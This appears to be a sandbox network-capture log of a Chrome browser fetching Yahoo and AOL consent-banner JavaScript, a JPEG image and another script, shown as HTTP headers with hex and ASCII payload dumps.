                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1009INData Raw: 49 66 72 61 6d 65 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 75 2e 4d 65 73 73 61 67 65 54 79 70 65 2e 63 6f 6e 74 65 78 74 44 61 74 61 3a 76 61 72 20 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 72 65 74 75 72 6e 28 30 2c 63 2e 69 73 56 61 6c 69 64 53 65 73 73 69 6f 6e 56 61 6c 75 65 29 28 6e 2c 65 2e 63 6f 6f 6b 69 65 52 65 73 75 6c 74 2e 63 6f 6e 73 65 6e 74 43 6f 6f 6b 69 65 73 29 3f 6e 3a 6e 75 6c 6c 7d 28 65 2c 6e 2e 73 65 73 73 69 6f 6e 29 3b 69 66 28 6e 2e 69 73 42 61 6e 6e 65 72 45 6c 69 67 69 62 6c 65 26 26 21 64 29 7b 6f 2e 64 69 73 70 6c 61 79 46 72 61 6d 65 28 29 2c 74 3d 21 30 2c 79 28 65 2c 22 63 6a 73 42 61 6e 6e 65 72 44 69 73 70 6c 61 79 22 29 2c 6f 2e 72 65 66 72 65 73 68 46 72 61 6d 65 53 69 7a 65 28 29 3b 76 61 72 20 6c 3d 54 28 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Iframe();break;case u.MessageType.contextData:var d=function(e,n){return(0,c.isValidSessionValue)(n,e.cookieResult.consentCookies)?n:null}(e,n.session);if(n.isBannerEligible&&!d){o.displayFrame(),t=!0,y(e,"cjsBannerDisplay"),o.refreshFrameSize();var l=T(e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 6f 6e 74 61 69 6e 65 72 53 65 6c 65 63 74 6f 72 3d 6e 75 6c 6c 2c 6e 2e 6e 6f 72 6d 61 6c 69 7a 65 64 4f 70 74 69 6f 6e 73 2e 75 69 4f 70 74 69 6f 6e 73 2e 63 6f 6e 74 61 69 6e 65 72 3d 6e 75 6c 6c 29 2c 6e 2e 69 6e 6c 69 6e 65 55 72 69 2b 3d 22 26 73 74 79 6c 65 3d 22 2e 63 6f 6e 63 61 74 28 74 29 2c 6b 28 6e 29 7d 29 29 3b 28 30 2c 66 2e 64 69 73 70 61 74 63 68 54 61 73 6b 43 6f 6d 70 6c 65 74 65 64 45 76 65 6e 74 29 28 22 22 2c 21 31 29 2c 65 3f 28 45 28 65 2c 6e 2c 7b 65 74 61 67 3a 22 66 61 69 6c 65 64 22 7d 29 2c 28 30 2c 70 2e 77 61 72 6e 29 28 22 45 72 72 6f 72 20 64 75 72 69 6e 67 20 64 65 63 69 73 69 6f 6e 3a 20 22 2e 63 6f 6e 63 61 74 28 65 2e 6d 65 73 73 61 67 65 3f 65 2e 6d 65 73 73 61 67 65 3a 65 29 29 29 3a 45 28 65 2c 6e 29 7d 63 61 74 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ontainerSelector=null,n.normalizedOptions.uiOptions.container=null),n.inlineUri+="&style=".concat(t),k(n)}));(0,f.dispatchTaskCompletedEvent)("",!1),e?(E(e,n,{etag:"failed"}),(0,p.warn)("Error during decision: ".concat(e.message?e.message:e))):E(e,n)}catc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 74 20 63 68 65 63 6b 20 66 61 69 6c 75 72 65 2e 20 49 73 20 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 20 6f 6e 6c 69 6e 65 3f 22 29 29 2c 6f 28 65 2c 74 29 7d 28 65 2c 6e 2c 6f 2c 61 29 3b 65 6c 73 65 7b 73 77 69 74 63 68 28 69 2e 61 63 74 69 6f 6e 29 7b 63 61 73 65 20 33 3a 76 61 72 20 63 3d 69 2e 74 72 61 63 6b 55 73 65 72 49 6e 74 65 72 61 63 74 69 6f 6e 2c 75 3d 69 2e 75 6e 73 61 66 65 43 6f 6e 73 65 6e 74 49 6e 6c 69 6e 65 55 72 69 2c 6c 3d 28 30 2c 72 2e 69 73 49 6e 6c 69 6e 65 43 6f 6e 73 65 6e 74 53 75 70 70 6f 72 74 65 64 29 28 21 31 29 2c 66 3d 28 30 2c 70 2e 69 73 56 61 6c 69 64 43 6f 6e 73 65 6e 74 55 72 69 29 28 75 2c 6e 29 3b 75 3f 66 3f 31 3d 3d 3d 28 73 3d 74 2e 69 6e 6c 69 6e 65 43 6f 6e 73 65 6e 74 3f 6c 3f 31 3a 31 30 31 3a 31 30 33 29 26 26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t check failure. Is ".concat(n," online?")),o(e,t)}(e,n,o,a);else{switch(i.action){case 3:var c=i.trackUserInteraction,u=i.unsafeConsentInlineUri,l=(0,r.isInlineConsentSupported)(!1),f=(0,p.isValidConsentUri)(u,n);u?f?1===(s=t.inlineConsent?l?1:101:103)&&
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 61 67 65 22 7d 29 2c 41 3d 70 3b 69 66 28 31 3d 3d 3d 45 2e 64 65 74 65 72 6d 69 6e 61 74 69 6f 6e 2e 61 63 74 69 6f 6e 26 26 31 3d 3d 3d 6b 2e 61 63 74 69 6f 6e 29 72 65 74 75 72 6e 20 76 6f 69 64 20 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 76 61 72 20 6f 3d 22 68 74 74 70 73 3a 2f 2f 22 2e 63 6f 6e 63 61 74 28 65 2e 63 6f 6e 73 65 6e 74 48 6f 73 74 29 2c 69 3d 28 30 2c 61 2e 64 65 66 61 75 6c 74 29 28 65 2e 63 6f 6e 73 65 6e 74 48 6f 73 74 29 3b 43 2e 63 6f 6f 6b 69 65 3d 69 2e 63 6f 6f 6b 69 65 50 61 69 72 3b 76 61 72 20 73 3d 7b 73 74 79 6c 65 3a 65 2e 69 73 53 74 69 63 6b 79 42 61 6e 6e 65 72 3f 22 69 6e 6c 69 6e 65 22 3a 22 6f 76 65 72 6c 61 79 22 2c 63 6f 6e 73 65 6e 74 42 61 73 65 55 52 49 3a 6f 2c 65 78 70 65 72 69 6d 65 6e 74 3a 65 2e 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: age"}),A=p;if(1===E.determination.action&&1===k.action)return void function(e,n,t){var o="https://".concat(e.consentHost),i=(0,a.default)(e.consentHost);C.cookie=i.cookiePair;var s={style:e.isStickyBanner?"inline":"overlay",consentBaseURI:o,experiment:e.e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 77 65 6c 6c 6e 65 73 73 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 6c 69 66 65 73 74 79 6c 65 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 6e 65 77 73 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 73 68 6f 70 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 73 70 6f 72 74 73 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 77 65 61 74 68 65 72 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6f 6c 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 22 2c 22 68 74 74 70 73 3a 2f 2f 6e 65 77 73 2e 79 61 68 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ttps://www.aol.com/wellness/","https://www.aol.com/lifestyle/","https://www.aol.com/news/","https://www.aol.com/shop/","https://www.aol.com/sports/","https://www.aol.com/weather/","https://www.aol.com/shopping/","https://www.yahoo.com/","https://news.yaho


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              55192.168.2.45107687.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC530OUTGET /uu/api/res/1.2/6x_jt5f8kHYIVKLC8RJf3Q--~B/Zmk9c3RyaW07aD0yNzI7cT05NTt3PTU2MDthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/22383490-8588-11ef-bef3-ab14bc1f4efd.cf.webp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1082INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="22383490-8588-11ef-bef3-ab14bc1f4efd.webp"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Etag: "e1bf63fc9cd6cb28e4f8525f7ea65821"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 15:17:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Request-Id: 54f337ea9086ebaab23f7a381c2e9903
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 15:43:54 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server-Timing: cld-fastly;mitm=po;dur=2;cpu=1;start=2024-10-08T15:43:54.870Z;desc=hit,rtt;dur=114,content-info;desc="width=560,height=272,bytes=67394,owidth=2800,oheight=1575,obytes=1879048,ef=(1,13,17,23,30)"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Disposition,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 12582
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cld_id: 54f337ea9086ebaab23f7a381c2e9903
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-width: 560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-image-height: 272
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 75806
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e2 02 1c 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 02 0c 61 70 70 6c 04 00 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 e8 00 0a 00 08 00 08 00 27 00 34 61 63 73 70 41 50 50 4c 00 00 00 00 41 50 50 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 61 70 70 6c 0a d1 15 83 4f 11 66 89 7d 0c 18 4b 48 d2 f6 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 64 65 73 63 00 00 00 fc 00 00 00 34 63 70 72 74 00 00 01 30 00 00 00 50 77 74 70 74 00 00 01 80 00 00 00 14 72 58 59 5a 00 00 01 94 00 00 00 14 67 58 59 5a 00 00 01 a8 00 00 00 14 62 58 59 5a 00 00 01 bc 00 00 00 14 72 54 52 43 00 00 01 d0 00 00 00 10 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: JFIFICC_PROFILEapplmntrRGB XYZ '4acspAPPLAPPL-applOf}KHdesc4cprt0PwtptrXYZgXYZbXYZrTRCc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 26 d2 e3 76 4f 6e 7f 3d 01 0b b9 da 4e 80 e4 1c 7b e8 0f db ce 80 e8 64 fb e8 0f de f8 ce 80 e8 b2 2b 71 ec 31 a0 38 69 f2 39 6c e8 0e 1d ce 72 79 ce 80 f8 ad bb db 40 75 a0 39 66 db ed a0 38 1c f0 3b e8 09 61 8d 8a 97 51 c8 c7 e8 34 07 2d bb 71 0c 0b 68 09 a9 28 aa 6b 5d c5 3c 3c 2a e5 c9 38 0a 3e 49 3a 01 86 d1 6b b7 d7 55 c3 15 45 c5 61 d8 aa 8c e3 b3 60 9f c3 8e 4f 6f df be 80 21 51 13 5b e8 ea 26 92 68 20 a7 1c 06 10 8f 31 d7 b0 1d b9 24 60 91 ee 79 3d b5 d1 5a ac 96 5f ca c3 e6 c0 b6 4b 65 05 f2 f2 96 c0 65 86 16 1b 99 91 77 33 01 8e e4 70 a3 9c 7b f2 35 2c f6 26 25 17 69 b7 ff 00 e0 c3 ef 1e c5 b2 8a cd 6f 8e 9e de 89 0c 69 fc c5 c9 de e6 4c 00 48 27 df 8e f8 03 f2 d4 4d 8b 0f b1 f2 7a ec d8 07 ba 4f fc 44 3a 12 a0 aa 80 ae cf ed f9 76 3a e7 02 df
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &vOn=N{d+q18i9lry@u9f8;aQ4-qh(k]<<*8>I:kUEa`Oo!Q[&h 1$`y=Z_Keew3p{5,&%ioiLH'MzOD:v:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 62 a0 c1 61 e9 4e 82 e8 aa d8 05 9a cb 0c 75 97 57 32 cd 52 d2 19 27 9d 8b ff 00 43 39 38 8c 15 39 03 e3 38 e3 5c f6 f2 b6 af 26 a6 5d a0 8a 16 45 f6 06 ab 7a d9 23 8a 99 d9 a3 8e 3d bb 97 7a b6 e7 4c 1c 30 1f 7e 39 d4 59 b8 4a eb 0b 55 47 53 74 f7 51 75 3d a7 a8 e9 2b 2f 96 8b 67 93 45 49 41 39 8e b6 8e 8a a5 80 a8 79 53 20 b6 25 08 50 2e 7d 21 bb 16 d4 e6 32 cf 49 cd 62 f8 55 ee 69 9b c7 6f 22 67 80 bd 63 e1 d7 4c db 2e 16 eb c5 c6 59 66 7d d7 05 92 0a 16 90 b4 71 93 b1 e5 28 09 12 10 c4 fa 8e 06 46 70 75 7b cf e0 ad 64 d6 3e 82 69 8a 79 de 5e a5 bb 52 f3 31 bb d0 6b a9 3f c6 4f 4a 58 68 ee 09 d1 fd 33 35 4d d0 23 43 47 59 50 eb e5 47 91 c4 98 19 2d f3 8c fe 7a d7 57 f8 55 46 a4 89 72 dc bb d7 7e 5d 18 c1 c3 f6 64 56 ac 8e d2 7b 43 29 b7 f5 85 0f 50 f4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: baNuW2R'C9898\&]Ez#=zL0~9YJUGStQu=+/gEIA9yS %P.}!2IbUio"gcL.Yf}q(Fpu{d>iy^R1k?OJXh35M#CGYPG-zWUFr~]dV{C)P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 4f 62 40 d5 ba b7 08 c9 33 da bc dd 94 f8 b6 74 59 e8 6b 04 77 ba c6 b9 75 0c 33 56 d1 20 75 8d e6 3b 51 5d 9b 71 39 cf c9 27 f5 d5 ea 2c 1c 34 da 8c 62 6f f2 57 f2 77 e4 4f 84 6b a5 19 6b 7c 3d af 99 5a 9a cb 6e 85 44 71 bc b5 55 f2 cc 44 54 90 13 e9 2f 21 20 64 93 c2 e4 f7 ed ce a4 6a cd 4e 97 e9 b3 5c cb e8 8f 86 fa ef 73 3b bf a4 25 87 c2 e8 2f ad 4d 63 e9 d4 db 29 85 12 49 36 96 2c 7b bc 84 9e c0 f7 1d b5 13 35 d8 a9 f3 3d c8 9b 5f e8 60 b9 65 8b e7 2a 9e 89 e8 5e 8b a4 e8 ae 9c a6 b4 86 12 d3 d3 26 ed b9 c9 66 27 9c 7d c9 38 d5 1e d4 ee 9e 45 7a 76 d9 51 c8 5c 5b 52 f3 fe 42 76 3e 93 a5 a1 15 57 3a a5 82 03 33 35 45 44 a0 6d 54 1e ca 3e 00 d7 2b ec 59 be fe 9c 27 3b e5 57 76 41 6f aa 3c 47 b3 d5 46 f6 8b 4c e2 2a 40 7c b7 95 7f af e7 1a b5 51 c1 c9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Ob@3tYkwu3V u;Q]q9',4boWwOkk|=ZnDqUDT/! djN\s;%/Mc)I6,{5=_`e*^&f'}8EzvQ\[RBv>W:35EDmT>+Y';WvAo<GFL*@|Q
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 68 07 4e 85 b7 50 db 2d 57 1f 11 6e 34 b3 d6 53 d8 e5 11 c5 4b 1d 32 c8 af 2b c5 26 c9 1c b1 c0 54 93 c9 cf a5 bd 52 20 38 ce 80 f3 e7 8b 55 b5 75 7e 21 de 63 ad a8 33 4d 43 30 a0 91 c9 ce e7 81 44 6c df 9b 32 33 1f 92 c4 fb e8 05 1d 01 34 70 00 8b 51 2b 01 19 fd f3 f6 1a 00 ad 86 fb 4b 61 96 6a ef a2 5a ba 92 a1 60 49 7f 02 1c e4 b9 1d c9 c0 c0 c6 3b 9d 01 5a ed d4 57 2b c4 be 6d 7c cd 26 d0 44 28 1b 0b 16 4e 48 55 1c 0c 9f dc 9c 9e 74 06 b7 e1 df 4b d6 5b 3a 06 e5 5a f7 56 a6 ae eb 6a 1f a3 8e 40 18 ac 34 69 52 a5 8b 60 7f 53 42 41 cf 00 0e 4e 78 d0 19 7d 25 ba 24 b8 9a 5a e5 5f 27 6c 8b e7 03 b8 70 3d 2d f7 e7 1f be 80 23 63 b7 c7 29 98 ab 6d 27 08 d8 41 96 24 13 b4 13 ec 46 7e df 3a 02 b7 52 c5 45 4f 59 2a c7 46 20 2c 42 6d 27 24 10 7d 58 1f d3 d8 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: hNP-Wn4SK2+&TR 8Uu~!c3MC0Dl234pQ+KajZ`I;ZW+m|&D(NHUtK[:ZVj@4iR`SBANx}%$Z_'lp=-#c)m'A$F~:REOY*F ,Bm'$}X|
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC793INData Raw: ac 73 24 ed 91 85 1f e5 1f be ac 14 27 83 ec 6b 7b fe 49 7a d6 20 8d 34 d6 ed 49 ba 03 a7 61 ea 83 25 a1 d6 18 62 a6 0b be 6a aa 62 d2 48 33 c8 dc df 84 67 e3 5c f9 3b 4f a3 de 34 de fd 98 5d 9f e9 fe 68 3f 74 e7 86 9d 3d 67 a9 a8 96 2b 64 7e 63 bb 39 98 0c e3 f2 3e c3 ed 9d 51 b2 f9 cc 84 ef d4 4a a7 03 ef cb 2f 65 52 fd d2 f5 d1 f6 8b 75 c2 37 a9 a0 92 a2 08 cf 99 0c 4f 1b 4c 8a 78 07 6f 7f ed f1 ac f0 b4 f2 52 ce d7 48 bd 94 f8 90 4c f5 6a b1 17 b9 94 f4 25 a7 c2 5b 95 5c cd 74 b9 d3 b4 f2 d4 48 c6 39 65 65 80 12 7b 1c 9c 7b fe e7 56 cc c5 4b 8b a7 31 13 7f d8 9a b1 67 21 0c 7a 44 5d 01 ba fb a6 2c f5 b3 d7 d2 f8 71 d2 14 6e 0d 43 53 d4 d5 a9 f2 e2 58 d1 40 2a ac d8 04 be ec 9d 99 e3 19 c6 b5 25 d6 61 e3 ff 00 bb d2 bb f1 a2 63 0b 1d cb 3a 7c eb d8 1b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s$'k{Iz 4Ia%bjbH3g\;O4]h?t=g+d~c9>QJ/eRu7OLxoRHLj%[\tH9ee{{VK1g!zD],qnCSX@*%ac:|
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: e9 2e a6 45 15 72 53 2c 10 47 1c cc 10 88 fd 6b fd 45 b7 06 27 ff 00 73 96 2d da aa f6 73 73 a3 bc 7a d1 4a 92 9d 9c 55 ae b3 fb b7 66 15 75 4b 75 c6 a2 a2 f1 46 12 2a 2a 47 10 d3 4d b7 67 99 33 29 2c 81 73 97 65 1b 39 19 c6 e3 aa fd ec 55 aa 9b 8d 53 bb 8f 41 6d 88 f9 11 46 ca 0b 3c d6 44 a3 ea 5a 74 ac 92 29 69 15 27 a8 82 40 ae 3f ad 40 46 20 30 fb 37 cf 71 a8 65 6c 91 7e 8b d3 46 d4 54 5e e8 00 93 12 54 60 60 6f c7 3a e3 33 24 86 a6 a2 8a 4f 36 9e 66 86 54 23 64 91 92 ac a7 e4 11 c8 ef a0 0c 75 24 15 ae f1 cc f2 c5 59 1d 3c 4b 0c 95 71 ce b3 19 1f 3c 97 65 24 f7 38 5c fb 00 34 05 7b bb ad 6a db ea 18 11 31 a1 41 3c ac b8 07 6c 92 46 b8 f9 f4 22 0f 9c 83 a0 29 6f 43 b5 7c 94 62 38 c9 2d c8 1e fc 1d 01 6a 1a b4 57 29 2d 3c 4a 30 41 60 18 9c 1e 3b 6e d0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .ErS,GkE's-sszJUfuKuF**GMg3),se9USAmF<DZt)i'@?@F 07qel~FT^T``o:3$O6fT#du$Y<Kq<e$8\4{j1A<lF")oC|b8-jW)-<J0A`;n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: fc 95 ec ae 72 59 23 d2 76 4f fc 9b 2d 3c 10 d1 06 8a 18 b7 d4 d4 3e d8 d4 63 24 0c f0 07 e5 df e0 6a a1 94 99 1a fe 67 90 11 ab a4 ee a3 14 34 71 74 d5 9a b2 f5 79 11 9a 88 22 12 45 03 b8 40 e7 1d 99 8f e1 1c fe 7f 1a e7 e1 fe 1b 9b 35 71 1c f4 54 61 f6 cd dd ea 18 7f e4 f3 07 89 7d 65 50 9d 55 1f 51 d5 4e 97 0a aa ba 6c a4 52 30 f2 a2 8f fc a1 7d 82 83 c7 dc 6b f4 7e 23 18 ca d5 12 16 b7 95 a8 4c 63 ea 75 23 e5 5e c7 7e 1f 52 f5 27 f1 d6 1d 4a a5 ec d2 53 47 51 bd 90 0f 2c 96 f4 b6 e3 c8 1d fd f8 3a e1 cd a3 25 8d 12 af 93 e6 43 a0 91 e9 9f 71 e8 3b 75 7d be 87 ca 8e 8a 68 99 e5 4f 31 b6 b6 e2 aa 01 39 3f 1c 6b ca ad d2 9e bb ba ce ed fb 15 99 5a b2 79 04 d6 a4 75 9e 65 5c 61 42 4d 3a c7 b9 db b2 9f 7f b6 31 ae 3b 3c 52 f4 45 8d 9e 50 ec 86 a2 f6 ee 17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: rY#vO-<>c$jg4qty"E@5qTa}ePUQNlR0}k~#Lcu#^~R'JSGQ,:%Cq;u}hO19?kZyue\aBM:1;<REP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 8a 26 be 14 d6 cc 7f 99 25 8a bd 5e 5f 21 2f 04 6b a0 b8 78 93 49 13 79 73 56 f9 b5 52 d5 2d 6d 3a bd 38 52 bf 89 39 1b 5b 3b 46 7e 75 c7 c5 d6 ee f4 a5 8e bc 7b 72 22 77 30 bb 14 7f 4b b7 2e 90 d4 bf c4 b7 43 dc 2c f7 ae 9f b9 f8 5b 51 7d fa 2b d3 c8 b5 f2 53 b3 35 30 a9 6c 7a 96 10 40 5e ed 93 80 38 07 be bc ff 00 09 95 77 d1 c9 fc d5 3f 55 3f 3d b4 68 c4 e4 18 af 74 2d 77 c5 3c 7e e6 6b 21 56 11 b6 19 89 55 3b 8f b8 23 5c e5 b4 fc ca 1d b6 b2 6d 1d c9 27 3c 7b e8 03 34 b4 f2 2d 92 a6 5a 48 cb cb 34 82 19 06 fe 4c 6b b5 f8 19 c9 25 b6 ff 00 fc 7e fa 02 d5 08 b2 de 6d 94 b6 db c5 ec 5a 6a a9 27 95 12 69 a9 1d e3 10 b6 08 0c 63 0c fc 48 64 3f 84 e3 77 ec 05 1b 95 96 aa d8 90 d6 99 a0 ac a5 aa f4 c3 51 4c c5 a3 2e 3b a1 24 02 18 77 da 40 38 20 f6 23 40 54
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &%^_!/kxIysVR-m:8R9[;F~u{r"w0K.C,[Q}+S50lz@^8w?U?=ht-w<~k!VU;#\m'<{4-ZH4Lk%~mZj'icHd?wQL.;$w@8 #@T
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:36 UTC1300INData Raw: 28 dc 2f fd 2b e1 f3 d3 d3 dc eb a2 a6 b8 dc 23 2f 12 c8 37 4a e8 a7 f0 a0 3c 0c e7 9c 9c 93 ce ad d8 5e 17 b9 92 5f a9 95 3e 27 2c 8c 96 ce fa 6d ec 86 0b e3 2f 88 32 f5 32 cb 71 8b a8 67 a1 4a 54 f2 85 b8 d2 33 bb 9c f2 e5 b3 db b0 d7 b8 70 fd 18 68 c6 8c 56 a2 7e fb 42 6b 15 41 23 fb 9b bf ee 20 74 27 87 fd 51 e2 4c b5 b5 0b 0d 4c 71 b4 45 62 76 5c 37 03 3b 57 3d b2 7b 9f 83 ad 79 8e 2d c6 e3 9e 95 d1 c8 4c 59 b5 1d 24 44 8f fb 9a dd a2 0b ed 4d 08 e8 be a4 b3 49 4b 4e 29 55 6b 2b 20 6d d1 b9 88 03 b4 37 70 79 ff 00 5d 55 a6 cc 56 85 fd 5a cf 45 72 95 f9 95 8a fe b3 57 65 de 93 e9 aa 3b 20 a8 a3 b7 5d 6b 26 a7 94 92 ad 3c 85 b6 c7 83 90 33 fe 9a f2 be 32 e2 49 79 95 1c 9d d0 92 a7 5d d7 57 e4 86 92 bd 37 35 55 8c ad 05 2f 99 b8 86 ce ec 0c 0f 6f cc eb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (/+#/7J<^_>',m/22qgJT3phV~BkA# t'QLLqEbv\7;W={y-LY$DMIKN)Uk+ m7py]UVZErWe; ]k&<32Iy]W75U/o


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              56192.168.2.45107787.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:35 UTC675OUTGET /ybar/cerebro_min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: edge-mcdn.secure.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
